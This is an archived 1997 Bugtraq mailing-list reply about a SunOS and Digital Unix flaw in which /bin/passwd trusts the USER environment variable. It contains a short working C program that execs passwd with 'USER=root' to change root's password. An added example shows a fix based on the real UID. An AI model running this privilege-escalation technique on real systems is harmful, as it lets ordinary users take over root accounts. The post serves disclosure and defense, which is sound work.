[4525] in bugtraq

Re: SunOS exploit. & DigitalUnix

daemon@ATHENA.MIT.EDU (Joe Zbiciak)
Tue May 20 16:37:17 1997

Date: 	Tue, 20 May 1997 08:00:37 -0500
Reply-To: jzbiciak@DALDD.SC.TI.COM
From: Joe Zbiciak <jzbiciak@DALDD.SC.TI.COM>
X-To:         mmokrejs@PRFDEC.NATUR.CUNI.CZ
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To:  <Pine.OSF.3.96.970520101310.1759F-100000@prfdec.natur.cuni.cz>
              from "Martin Mokrejs" at May 20, 97 10:17:29 am

'Martin Mokrejs' said previously:
|
| This also works on Digital Unix 4.0B :-(
|
| login as generic user, then run bash,

[...]

| I successfully modified root's password :-( Even though we have C2 security
| installed :-(
|
| I suggest - disable bash !!!

Wrong answer!

If bash can do it, then ANY user-level process can do it.

Here's a program I whipped together in under a minute.  If I can do that
in a minute, what's disabling bash going to do?

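#include <unistd.h>

int main (void) {
        /* argument vector: the program is invoked as "passwd root" */
        char * argv[] = { "passwd", "root", 0 };
        /* environment chosen entirely by the caller, no shell involved */
        char * envp[] = { "USER=root", 0 };

        execve("/bin/passwd",argv,envp);
        return 1;       /* reached only if execve() failed */
}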

--Joe

--
 +--------------Joseph Zbiciak--------------+
 |- - - - jzbiciak@daldd.sc.ti.com - - - - -|
 | - - http://ee1.bradley.edu/~im14u2c/ - - |      Not your average "Joe."
 |- - - - Texas Instruments,  Dallas - - - -|
 +-------#include <std_disclaimer.h>--------+
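
The program in the message above hands /bin/passwd an environment containing USER=root, which any process can do through execve(). The following is an added example, not part of the original post and not vendor code: a sketch of how a privileged program can take the caller's identity from the real UID instead of from the environment. The function names and the simple policy are assumptions made for illustration.

```c
#include <pwd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* Look up the invoking account from the real UID, which the kernel sets and
 * the caller cannot forge through execve()'s envp. Returns 0 on success. */
int real_caller_name(char *buf, size_t len)
{
    struct passwd *pw = getpwuid(getuid());

    if (pw == NULL || strlen(pw->pw_name) >= len)
        return -1;              /* unknown UID or name too long: fail closed */
    strcpy(buf, pw->pw_name);
    return 0;
}

/* Policy check (hypothetical): only root may change another account's
 * password. Takes the real UID and the name derived from it, never $USER. */
int may_change_password(uid_t ruid, const char *caller, const char *target)
{
    if (caller == NULL || target == NULL)
        return 0;
    if (ruid == 0)
        return 1;
    return strcmp(caller, target) == 0;
}

int main(int argc, char **argv)
{
    char caller[64];
    const char *claimed = getenv("USER");   /* caller-controlled, log only */
    const char *target;

    if (real_caller_name(caller, sizeof caller) != 0)
        return 2;
    target = (argc > 1) ? argv[1] : caller;
    if (claimed != NULL && strcmp(claimed, caller) != 0)
        fprintf(stderr, "note: USER=%s does not match real account %s\n",
                claimed, caller);
    if (!may_change_password(getuid(), caller, target)) {
        fprintf(stderr, "%s may not change the password of %s\n", caller, target);
        return 1;
    }
    printf("%s may change the password of %s\n", caller, target);
    return 0;
}
```

Run as an ordinary user with USER=root in the environment and "root" as the argument, this refuses and logs the mismatch, since the decision depends only on getuid().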
